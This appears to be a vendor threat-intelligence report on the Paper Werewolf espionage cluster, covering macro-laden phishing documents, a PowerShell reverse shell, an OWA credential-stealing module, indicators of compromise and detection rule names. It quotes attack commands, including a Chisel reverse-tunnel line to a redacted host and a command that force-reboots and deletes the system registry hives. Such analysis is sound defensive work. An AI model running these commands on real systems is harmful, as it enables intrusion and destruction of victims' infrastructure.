The BI.ZONE Threat Intelligence team has recorded a surge in the activity of the Paper Werewolf cluster (also known as GOFFEE), which has conducted at least seven campaigns since 2022. Among the victims are government, energy, financial, media, and other organizations.
The adversaries send out phishing emails with a Microsoft Word attachment containing a malicious macro. However, their latest activity goes beyond espionage purposes: we have detected a case where Paper Werewolf disrupted the operation of the compromised infrastructure.
Attackers tend to distribute phishing emails on behalf of well-known organizations: large institutions, regulators, law enforcement. Using the names of reputable companies makes the victim trust the sender and open the email. It should be noted that organizations are not liable for the actions of criminals and related damage.
Key findings
- While primarily committed to cyber espionage, such clusters can ruin the operation of target infrastructures simply out of spite, once their primary goal is achieved.
- Apart from experimenting with post-exploitation frameworks, the adversaries develop their own implants for such frameworks which significantly impedes detection.
- The attackers opt for the PowerShell interpreter as a versatile tool that enables them to bypass corporate defenses.
Campaign
Paper Werewolf uses Microsoft Word documents that contain a malicious macro. Such files are likely distributed via phishing emails.
It is noteworthy that the adversaries often apply the Gophish open-source framework to organize their mailings. The framework is designed for testing enterprise vulnerability to phishing.
The distributed files are masked as documents from various organizations (a research institution, a municipal administration, a power grid company, etc.).
As the malicious file is encrypted, the victim is prompted to allow macros.
Once the victim allows macros, the document content is decrypted.
The document is decrypted by replacing special characters with respective Russian letters.
Searching for the payload within the document starts after the DigitalRSASignature keystring. The payload is Base64‑encrypted and has two parts divided by a CHECKSUM string.
The macro decrypts the payload and writes it into two files:
%USERPROFILE%\UserCache.ini(PowerShell script)%USERPROFILE%\UserCache.ini.hta(HTA)
To gain persistence in the compromised system, the path to UserCache.ini.hta is written into the following registry parameter:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Windows\LOADTo conceal the malicious programs in the compromised system, the threat actor uses environment variables:
AZURE_RESOURCE_GROUP=JAB0AHkAegBmAHQAbgBnAGkAYgBpACAAPQAgACgARwBlAHQALQBEA[redacted]ONEDRIVE_RESOURCE_GROUP=AuADAAIABTAGEAZgBhAHIAaQAvADUAMwA3AC4AMwAiACkAOwA[redacted]VB=VBScriptAZURE_DECODE=[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($env:AZURE_RESOURCE_GROUP+$env:ONEDRIVE_RESOURCE_GROUP))
In one of the cases, the malicious document contained a link to a 1×1 pixel image. Using this trick, the attackers can monitor whether the victim has opened the malicious document.
The HTA file creates and runs a file %USERPROFILE%\UserCacheHelper.lnk.js to execute the PowerShell script %USERPROFILE%\UserCache.ini.
The encrypted content of UserCache.ini is a reverse shell being a PowerShell script known as PowerRAT, which:
- installs a
Hiddenattribute for theUserCache.iniandUserCache.ini.htafiles - calls the server
hxxp://[redacted]:80/api/texts/<victim_id>for commands, wherevictim_idstands for[computer name]_[username]_[serial number of the system disk].
These are XML commands with the attributes below:
-CountRuns, a command runs counter
-Interval, a command interval in minutes
-Module, a Base64-encoded command (a PowerShell script) - runs the command received from the server, which is launched through
Invoke-Expression
In other attacks, the adversaries use their own loader mimicking explorer.exe. The malicious program loads and opens a decoy document. The decoy is written into the %TEMP% directory. Then the loader sends an HTTP POST request to the server to advance to the next stage. As of the date of this article, the next stage was not available for research, but we suppose that it involves a Mythic framework agent developed by the adversaries, known as PowerTaskel and QwakMyAgent. The function names in the loader are hashed with the Fowler–Noll–Vo algorithm.
Curiously enough, the attackers use this implant along with another framework agent, Freyja.
The threat actor’s arsenal also has a malicious IIS module Owowa that enables them to retrieve credentials during user authorization in the Outlook Web Access (OWA) service. The retrieved data is stored in the RAM in HashSet.
One of the Owowa modules would return a Base‑64‑encrypted dataset where the request header contains the username ZaDS0tojX0VDh82, and would delete the content of the decrypted dataset and return an Ok string (RSA‑encrypted) where the request header contains the username oACgTsBMliysfk.
To create a redundant access channel to the compromised IT infrastructure, the attackers resort to Chisel:
mastc.exe client --tls-skip-verify -v https://[redacted]:49611 R:socksThey probably use PsExec to run commands in remote systems. In particular, to perform destructive actions:
cmd.exe /c 'shutdown /r /f /t 5 && reg delete HKEY_LOCAL_MACHINE\SYSTEM /f && reg delete HKEY_LOCAL_MACHINE\SOFTWARE /f'To hinder the staff’s interaction with the compromised IT infrastructure, the criminals change account passwords:
net user [redacted] [redacted] /domain
In the cases above, the attackers use a PowerShell script to run commands.
Indicators of compromise
fa8853aaa156485855b77a16a2f613d9f58d82ef63505be8b19563827089bf5213252199b18d5257a60f57de95d8c6be7d7973df7f957bca8c2f31e15fcc947b8ba4cd7ea29f990cb86291003f82239bfafe28910d080b5b7d3db78e83c1b6f337b3fa8a3a05e4aedb25eb38d9e4524722f28c21fac9f788f87113c5b9184ef5804cd68f40d0bb93b6676447af719388e95cafd5a2b017a0386eb7de590ebf17disk-yanbex[.]rulobbyluxuries[.]com94.103.85[.]47185.244.182[.]875.252.176[.]5585.198.110[.]216
You can find more indicators of compromise related to the Paper Werewolf activity on the BI.ZONE Threat Intelligence portal.
MITRE ATT&CK
Detection
The BI.ZONE EDR rules below can help organizations detect the described malicious activity:
win_enable_macros_in_ms_office_documentwin_spawning_untipical_process_by_ms_office_appwin_hta_file_was_created_by_ms_office_appwin_unusual_mshta_parent_processwin_persistence_via_load_regkey_was_detectedwin_set_hidden_file_attribute_for_executable_or_scriptwin_suspicious_powershell_execution_code_from_filegen_chisel_usage_detectedwin_using_psexec_to_execute_process_on_remote_host
How to protect your company from such threats
To stay ahead of threat actors, you need to understand their methods and tools and take this information into account when assessing the threat landscape of your organization. For this purpose, we would recommend that you leverage the data from the BI.ZONE Threat Intelligence portal. It provides information about the current attacks, threat actors, their tactics, techniques, and tools. This data helps to ensure the precision of your security solutions, which in turn accelerates incident response and protects your company from the most critical threats.
